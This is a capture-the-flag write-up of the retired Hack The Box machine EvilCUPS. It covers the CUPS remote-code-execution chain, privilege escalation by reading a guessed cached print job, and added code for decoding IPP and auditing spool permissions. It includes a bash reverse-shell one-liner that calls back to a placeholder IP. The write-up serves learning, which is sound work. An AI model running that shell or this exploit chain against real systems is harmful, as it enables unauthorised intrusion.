# EvilCUPS (HTB)

## Intro.

Hello my fellow friends, it's been a while since I posted something, but today we have a retired HTB machine, so we can have some fun here too. SHALL WE!?

***

## Enumeration.

```
PORT    STATE SERVICE REASON         VERSION
22/tcp  open  ssh     syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLhyWEKe+YMaLWwGVFwyHt8c6bWzFkIrhtFZYPkBfui0+1IrwnUmA3TZq1yQ9vN7Jn+Id6YxfaXO7CfraX69S/Y=
|   256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICsRxZMgAIyL7cg9PIv83wIGkMGjzbkzS1jktKqQ6Kij
631/tcp open  ipp     syn-ack ttl 63 CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.2
```

From these results we can see an uncommon port, 631. Let's see what it has.

### Enumerate port 631.

A quick search shows that this port is IPP (Internet Printing Protocol), which I am not so familiar with.

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp>" %}

{% hint style="info" %}
So after some reading an.\
\
IPP: a protocol that uses HTTP POST requests to print over the network and to manage the printer, such as showing its status and more.\
\
CUPS (Common Unix Printing System): an open source project which allows a computer to act as a printer for Unix-based systems; it uses IPP as its communication protocol.
{% endhint %}
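To make the "HTTP POST" point concrete, here is a small decoder for the binary message that travels in the POST body, useful for reading captured IPP traffic. It is an added example, not part of the original write-up; the layout and tag values follow RFC 8010, while `encode_attr`, `parse_ipp`, `SAMPLE` and the `printer.example` URI are made up for illustration, and repeated groups of the same kind are merged for brevity.

```python
import struct

# Constants from RFC 8010 (IPP encoding); 0x000B is Get-Printer-Attributes.
GROUP_TAGS = {0x01: "operation-attributes", 0x02: "job-attributes",
              0x04: "printer-attributes"}
END_OF_ATTRIBUTES = 0x03
CHARSET, LANGUAGE, URI, KEYWORD = 0x47, 0x48, 0x45, 0x44

def encode_attr(tag: int, name: str, value: str) -> bytes:
    """value-tag, name-length, name, value-length, value (big-endian)."""
    n, v = name.encode(), value.encode()
    return struct.pack(">BH", tag, len(n)) + n + struct.pack(">H", len(v)) + v

def parse_ipp(body: bytes) -> dict:
    """Decode the body of an HTTP POST sent with Content-Type: application/ipp."""
    pos = 0
    def take(n: int) -> bytes:
        nonlocal pos
        if pos + n > len(body):
            raise ValueError("truncated IPP message")
        pos += n
        return body[pos - n:pos]

    # Fixed header: version (2 bytes), operation-id or status-code, request-id.
    major, minor, code, request_id = struct.unpack(">BBHI", take(8))
    groups, current, last = {}, None, None
    while (tag := take(1)[0]) != END_OF_ATTRIBUTES:
        if tag < 0x10:  # delimiter tag: a new attribute group starts
            current = groups.setdefault(GROUP_TAGS.get(tag, hex(tag)), {})
            last = None
            continue
        name = take(struct.unpack(">H", take(2))[0]).decode("ascii", "replace")
        value = take(struct.unpack(">H", take(2))[0])
        if current is None or not (name or last):
            raise ValueError("attribute value with no group or name to attach to")
        if name:
            last = name
            current[last] = []
        current[last].append(value)  # empty name: extra value of previous attr
    return {"version": f"{major}.{minor}", "code": code,
            "request_id": request_id, "groups": groups, "data": body[pos:]}

# Constructed sample request; the printer URI is a placeholder.
SAMPLE = (struct.pack(">BBHI", 2, 0, 0x000B, 1) + b"\x01"
          + encode_attr(CHARSET, "attributes-charset", "utf-8")
          + encode_attr(LANGUAGE, "attributes-natural-language", "en")
          + encode_attr(URI, "printer-uri", "ipp://printer.example/printers/demo")
          + encode_attr(KEYWORD, "requested-attributes", "printer-state")
          + encode_attr(KEYWORD, "", "printer-make-and-model") + b"\x03")
```
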

### Getting shell.

After a lot of searching I found that this version of CUPS is vulnerable to a chain of attacks which results in RCE.

{% embed url="<https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Summary>" %}

{% embed url="<https://github.com/IppSec/evil-cups/blob/main/evilcups.py>" %}

Thanks to these guys we are able to understand and exploit the vulnerable service and gain remote code execution.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FXV1z67nSK7JX11N0KLVT%2Fimage.png?alt=media&#x26;token=85094526-204b-467e-920c-cd6ed1320658" alt=""><figcaption></figcaption></figure>

Running this command advertises an evil printer, which is going to be added to our printers on the website.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FzjDw1rko1dGDzSVE9WzU%2Fimage.png?alt=media&#x26;token=72107dc1-224f-418c-afe4-a770333d5f25" alt=""><figcaption></figcaption></figure>

So by clicking on this printer and testing it, our command will be executed.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FntqXs44hFBp8mT3RO5AM%2Fimage.png?alt=media&#x26;token=6598f513-2ba6-4773-9cda-938a259522ae" alt=""><figcaption></figcaption></figure>

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FTonwX22H5txhTJ3kP4C8%2Fimage.png?alt=media&#x26;token=c64b6e7f-4756-4d09-ad96-895e28aba084" alt=""><figcaption></figcaption></figure>

By then we should receive a connection from the machine.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FScdUizox1nL0d6M2XyJD%2Fimage.png?alt=media&#x26;token=204210c8-dd39-45ea-8c51-119bc594a1ee" alt=""><figcaption></figcaption></figure>

### Stable shell.

I faced a problem where the shell would be killed after some period of time. To solve this we can use the *nohup* command and *&* as follows.

```
'nohup bash -c "bash -i >& /dev/tcp/<VPN-IP>/<PORT> 0>&1" &'
```

{% embed url="<https://en.wikipedia.org/wiki/Nohup>" %}

{% hint style="info" %}
A simple explanation of *nohup*: nohup is a [POSIX](https://en.wikipedia.org/wiki/POSIX) command which means "no hang up". Its purpose is to execute a command such that it ignores the [HUP](https://en.wikipedia.org/wiki/SIGHUP) (hangup) signal and therefore does not stop when the user logs out.

{% endhint %}

## Getting root.

Once we are on the machine, we can see that the folder */var/spool/cups*, which has the available printers, does not allow us to list its contents, so what can we do? After some searching I found that we may be able to guess the name of a cached job and read its content. So what is the format of the cached jobs?

```
d<5 print number>-<3 page>
```

From my understanding, I think print number refers to a printer number and page is how many pages it prints, so let's test this.

After some tries I got it.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FgyDM5PKul6yXFKq0oQIN%2Fimage.png?alt=media&#x26;token=2d287029-f80a-483e-ae2f-5366efa29d9b" alt=""><figcaption></figcaption></figure>

I am not sure if this was luck or just how it should be, but who cares, we got it. In the file we can also see the password for the root user.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2Fx3EIDoF1v70km0ONeC9U%2Fimage.png?alt=media&#x26;token=219a7efd-314f-46e1-9ca4-8adf11d26e5a" alt=""><figcaption></figcaption></figure>

Using this password we are able to log in as root.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FCIZXjjmCzoYsP4TO5RWN%2Fimage.png?alt=media&#x26;token=3335cdff-3d51-4745-95de-711915d151d7" alt=""><figcaption></figcaption></figure>
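Guessing a job name works whenever a directory grants the execute (traverse) bit without the read (list) bit: the contents cannot be listed, but a file inside can still be opened by its exact name if the file itself is readable. The audit below is an added example, not part of the original write-up, meant to be run by an administrator who can list the spool; `audit_spool`, `demo` and the 0710/0640/0600 fixture modes are constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Job data name format quoted above: "d", 5 digits, "-", 3 digits.
JOB_DATA = re.compile(r"d\d{5}-\d{3}")
CLASSES = {"group": (stat.S_IRGRP, stat.S_IXGRP),
           "other": (stat.S_IROTH, stat.S_IXOTH)}


def audit_spool(spool_dir: str) -> list[tuple[str, str, bool]]:
    """Return (file, class, dir_listable) for job data a class can read by name."""
    dir_mode = os.stat(spool_dir).st_mode
    findings = []
    for name in sorted(os.listdir(spool_dir)):
        if not JOB_DATA.fullmatch(name):
            continue
        file_mode = os.lstat(os.path.join(spool_dir, name)).st_mode
        if not stat.S_ISREG(file_mode):
            continue
        for cls, (r_bit, x_bit) in CLASSES.items():
            # Traverse on the directory plus read on the file is enough;
            # hiding the listing (no read bit on the directory) does not help.
            if dir_mode & x_bit and file_mode & r_bit:
                findings.append((name, cls, bool(dir_mode & r_bit)))
    return findings


def demo() -> list[tuple[str, str, bool]]:
    """Constructed fixture: a 0710 spool with one 0640 and one 0600 job file."""
    with tempfile.TemporaryDirectory() as tmp:
        spool = os.path.join(tmp, "spool")
        os.mkdir(spool)
        for name, mode in (("d00001-001", 0o640), ("d00002-001", 0o600)):
            path = os.path.join(spool, name)
            with open(path, "w") as fh:
                fh.write("constructed job data\n")
            os.chmod(path, mode)
        os.chmod(spool, 0o710)
        return audit_spool(spool)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Any finding with `dir_listable` set to `False` is a file protected only by the secrecy of its name; tightening the file mode or not retaining job data removes the exposure.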

## Conclusion.

This machine was quite fun and interesting. The only issue was the connection; I faced a lot of connection issues, but we got it in the end, so fun. :relaxed:
